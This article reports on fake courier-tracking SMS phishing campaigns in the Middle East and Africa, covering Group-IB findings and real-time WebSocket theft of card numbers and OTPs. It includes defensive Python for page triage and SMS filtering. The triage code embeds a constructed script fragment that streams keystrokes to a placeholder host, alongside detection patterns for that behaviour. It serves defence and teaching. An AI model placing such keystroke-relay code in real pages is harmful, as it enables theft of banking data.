Cybercriminals are increasingly leveraging fake shipment tracking scams across the Middle East and Africa (MEA) region to steal sensitive banking data through sophisticated real-time phishing tactics. These evolving schemes exploit the widespread reliance on postal and courier services for e-commerce deliveries, turning everyday transactions into significant security vulnerabilities.
According to analysis by Group-IB, a sharp surge in these fake shipment tracking scams was observed starting in early 2024, with explosive growth anticipated through 2025. Between December 2025 and February 2026, Egypt emerged as the most targeted nation, with 119 reported incidents. South Africa followed with 20 cases, alongside 7 in Ghana and 5 in Kenya, indicating a broad regional impact.
The primary tactic involves sending urgent SMS messages to recipients claiming delivery issues with their packages. These messages typically prompt users to click a provided link to update their address or pay a small handling fee. The link then directs victims to a meticulously crafted fake courier website, designed to mimic legitimate services, aiming to gain their trust.
Once on the forged website, victims are persuaded to enter personal information, including banking credentials, debit or credit card numbers, and one-time passwords (OTPs). This data is transmitted directly to the attackers in real time, leaving victims with little opportunity to recognize the fraudulent nature of the interaction before their information is compromised.
The Group-IB report highlights that postal services were the most frequently impersonated sector, accounting for 115 confirmed cases. However, financial services, telecommunications providers, and mobility platforms have also been subjected to repeated targeting by these criminal operations.
Real-Time Credential Theft Through Embedded Scripts
What distinguishes these modern fake shipment tracking scams is their technical sophistication in capturing data instantaneously. Researchers discovered that the phishing pages employ embedded scripts that establish a WebSocket connection to an attacker-controlled server the moment a user accesses the page. This feature facilitates a live data feed, transmitting every keystroke—encompassing card numbers, CVV codes, and OTPs—directly to the scammer.
This real-time data exfiltration occurs without any visible indication to the victim that their sensitive information is being transmitted. Furthermore, the script generates a unique UUID token for each user session, allowing attackers to meticulously track individual victims and suggesting a highly organized, large-scale operation.
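The live-feed pattern described above (a WebSocket opened on load, a keystroke handler, a per-session UUID) can be triaged from fetched page source. The following is an added example, not code from the Group-IB report or from any phishing kit; the two page fragments are constructed, the `relay` handler in the suspect sample is deliberately left undefined, and the hostnames are placeholders.

```python
import re
from urllib.parse import urlsplit

# Constructed page-source fragment carrying the indicators the report describes.
# relay() is intentionally undefined: only the indicators matter for triage.
SUSPECT_PAGE = """
<script>
const sid = crypto.randomUUID();
const ws = new WebSocket("wss://parcel-update.example.invalid/feed?s=" + sid);
document.addEventListener("keyup", relay);
</script>
"""

# Constructed benign tracking page: a plain form posted to the site's own origin.
BENIGN_PAGE = """
<form method="post" action="/track"><input name="tracking"><button>Track</button></form>
"""

# Each rule is a regex over the raw page source (HTML plus inline script).
RULES = {
    "websocket_open": re.compile(r"new\s+WebSocket\s*\(\s*[\"']wss?://", re.I),
    "keystroke_listener": re.compile(
        r"addEventListener\s*\(\s*[\"'](keyup|keydown|keypress|input)[\"']", re.I),
    "session_uuid": re.compile(
        r"randomUUID\s*\(|[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}", re.I),
}

WS_URL = re.compile(r"[\"'](wss?://[^\"'\s]+)", re.I)


def triage_page(source: str) -> dict:
    """Return matched indicators, WebSocket hosts, and whether the live-feed pattern is present."""
    hits = [name for name, rx in RULES.items() if rx.search(source)]
    ws_hosts = sorted({urlsplit(m).hostname for m in WS_URL.findall(source)})
    # WebSocket plus keystroke listener is the live-feed pattern; the UUID strengthens
    # the finding but is not required, since legitimate pages also use UUIDs.
    live_feed = "websocket_open" in hits and "keystroke_listener" in hits
    return {"indicators": hits, "ws_hosts": [h for h in ws_hosts if h], "live_feed": live_feed}


if __name__ == "__main__":
    for label, page in (("suspect", SUSPECT_PAGE), ("benign", BENIGN_PAGE)):
        print(label, triage_page(page))
```

The extracted WebSocket hosts are what a takedown or blocklisting team would pivot on, since the report notes that campaigns share hosting and IP space.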
The perpetrators behind these campaigns utilize a broad criminal infrastructure that spans multiple countries. They frequently employ inexpensive and disposable domain extensions such as .xyz, .sbs, .shop, and .click. Analysis of these campaigns reveals shared IP addresses and overlapping hosting patterns, pointing towards coordinated efforts and potentially a centralized command structure.
Group-IB researchers also noted characteristics strongly associated with Darcula, a known Phishing-as-a-Service (PaaS) platform reportedly originating from China. Darcula offers a vast repository of over 20,000 counterfeit domains and more than 200 pre-designed phishing templates, which are readily available to criminal operators, streamlining their attacks.
The design of the phishing pages is also optimized for mobile devices, as SMS-based links are commonly accessed via smartphones. Attackers utilize URL masks, such as appending ‘index.html’, to make the malicious links appear more legitimate while ensuring the fraudulent page loads correctly on mobile browsers. These pages are often configured to display their full content only to mobile users, further enhancing their deceptive appearance.
Individuals are strongly advised to exercise caution and avoid clicking on any shipment tracking links received via SMS or messaging applications. The recommended practice is to navigate directly to the official courier website and manually enter the tracking number. Additionally, users should be wary of messages demanding immediate payment for delivery or address updates, as legitimate courier companies typically do not charge fees for redelivery services. Reporting suspicious messages to local cybersecurity authorities or postal services is crucial for tracking and combating these threats.
Businesses are encouraged to proactively publish regular alerts about phishing campaigns that impersonate their brand to keep their customers informed about emerging threats. Implementing email authentication protocols such as DMARC, DKIM, and SPF can significantly help prevent spoofed messages from reaching customer inboxes. Collaboration with mobile carriers to filter fraudulent SMS patterns and the provision of a public verification tool for tracking messages are also vital strategies to reduce the number of individuals falling victim to these pervasive scams.
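One way a carrier or brand owner could filter the SMS pattern this article describes (a delivery or address-update lure plus a link on a disposable TLD, a non-official host, or an `index.html` mask). This is an added example, not a tool from the report; the lure phrases, the `OFFICIAL_DOMAINS` list and the sample messages are all constructed placeholders.

```python
import re
from urllib.parse import urlsplit

# Disposable TLDs named in the Group-IB analysis.
DISPOSABLE_TLDS = {"xyz", "sbs", "shop", "click"}
# Lure phrasing from the article: delivery problem, address update, small fee.
LURE_PHRASES = re.compile(
    r"(delivery (failed|issue|attempt)|unable to deliver|update your address|"
    r"(handling|redelivery|customs) fee|pay .{0,20}?fee)", re.I)
URL_RX = re.compile(r"https?://[^\s]+", re.I)

# Assumed official courier domains; in practice supplied by the brand owner.
OFFICIAL_DOMAINS = {"egyptpost.example"}


def assess_sms(text: str) -> dict:
    """Return a verdict (allow / review / block) and the reasons behind it."""
    reasons = []
    if LURE_PHRASES.search(text):
        reasons.append("delivery_lure")
    for url in URL_RX.findall(text):
        parts = urlsplit(url)
        host = (parts.hostname or "").lower()
        tld = host.rsplit(".", 1)[-1]
        official = any(host == d or host.endswith("." + d) for d in OFFICIAL_DOMAINS)
        if not official:
            reasons.append("non_official_host")
        if tld in DISPOSABLE_TLDS:
            reasons.append("disposable_tld")
        if parts.path.lower().endswith("index.html"):
            reasons.append("index_html_mask")
    # Lure text alone is weak (real couriers send delivery notices); a link that is
    # off-brand or on a disposable TLD turns it into a block decision.
    if "delivery_lure" in reasons and len(reasons) > 1:
        verdict = "block"
    else:
        verdict = "review" if reasons else "allow"
    return {"verdict": verdict, "reasons": reasons}


# Constructed sample messages (no real numbers, domains or links).
SAMPLES = [
    "Egypt Post: Your parcel could not be delivered. Update your address within 24h: http://eg-post-track.xyz/index.html",
    "Your parcel 1234 is out for delivery today. Track at https://egyptpost.example/track",
    "Egypt Post: delivery attempt failed, update your address at https://egyptpost.example/redelivery",
    "Reminder: your dentist appointment is tomorrow at 10:00.",
]

if __name__ == "__main__":
    for sms in SAMPLES:
        print(assess_sms(sms)["verdict"], sms[:60])
```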
